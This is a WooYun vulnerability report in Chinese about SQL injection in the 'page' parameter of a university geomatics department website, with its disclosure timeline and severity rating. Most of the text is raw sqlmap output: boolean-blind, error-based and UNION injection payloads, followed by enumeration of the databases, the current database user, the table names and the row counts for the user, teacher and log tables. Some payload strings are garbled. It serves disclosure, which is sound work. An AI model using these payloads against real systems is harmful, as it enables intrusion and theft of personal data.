乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-13: 细节已通知厂商并且等待厂商处理中 2016-01-14: 厂商已经确认,细节仅向厂商公开 2016-01-24: 细节向核心白帽子及相关领域专家公开 2016-02-03: 细节向普通白帽子公开 2016-02-13: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
注入点:报错注入
http://**.**.**.**/modules-Eng.php?page=IntroductionEng
直接爆dbs
Place: GETParameter: page Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=IntroductionEng' AND 9770=9770 AND 'iNlN'='iNlN Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page=IntroductionEng' AND (SELECT 1024 FROM(SELECT C0x3a64616e3a,(SELECT (CASE WHEN (1024=1024) THEN 1 ELSE 0 END)),0OR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x'uQum Type: UNION query Title: MySQL UNION query (NULL) - 9 columns Payload: page=IntroductionEng' UNION ALL SELECT NULL, NULL, Ce3a,0x474a5869624f50495a4e,0x3a706a713a), NULL, NULL, NULL, NULL,D 'TwRs'='TwRs---[14:31:58] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Ubuntuweb application technology: Apache 2.4.7, PHP 5.5.9back-end DBMS: MySQL 5.0[14:31:58] [INFO] fetching database names[14:32:00] [INFO] the SQL query used returns 2 entries[14:32:02] [INFO] retrieved: information_schema[14:32:03] [INFO] retrieved: geomaticsavailable databases [2]:[*] geomatics[*] information_schema
[14:33:32] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Ubuntuweb application technology: Apache 2.4.7, PHP 5.5.9back-end DBMS: MySQL 5.0[14:33:32] [INFO] fetching current user[14:33:33] [INFO] heuristics detected web page charset 'ascii'[14:33:33] [INFO] retrieved: becare@localhostcurrent user: 'becare@localhost'
涉及70表
Database: information_schema[40 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || INNODB_BUFFER_PAGE || INNODB_BUFFER_PAGE_LRU || INNODB_BUFFER_POOL_STATS || INNODB_CMP || INNODB_CMPMEM || INNODB_CMPMEM_RESET || INNODB_CMP_RESET || INNODB_LOCKS || INNODB_LOCK_WAITS || INNODB_TRX || KEY_COLUMN_USAGE || PARAMETERS || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLESPACES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+Database: geomatics[32 tables]+---------------------------------------+| `alumni-bak` || alumni || bbs || blockip || files || filesII || filesIII || graduation_photo || ieet_course_pdf_file || ieet_course_pdf_type || invite || invite_count || lesson || lessoneng || log || menubar || news || newsII || newsIII || news_class || page || paper || source || sys_log || teacher || teacher_data || teacher_memo || teacher_position || thesis || user || user_group || user_group_weight |+---------------------------------------+
Database: geomatics+-------+---------+| Table | Entries |+-------+---------+| user | 34 |+-------+---------+
Database: geomatics+---------+---------+| Table | Entries |+---------+---------+| teacher | 43 |+---------+---------+
2万多日志
Database: geomatics+-------+---------+| Table | Entries |+-------+---------+| log | 28726 |+-------+---------+
危害等级:高
漏洞Rank:16
确认时间:2016-01-14 03:33
感謝通報
暂无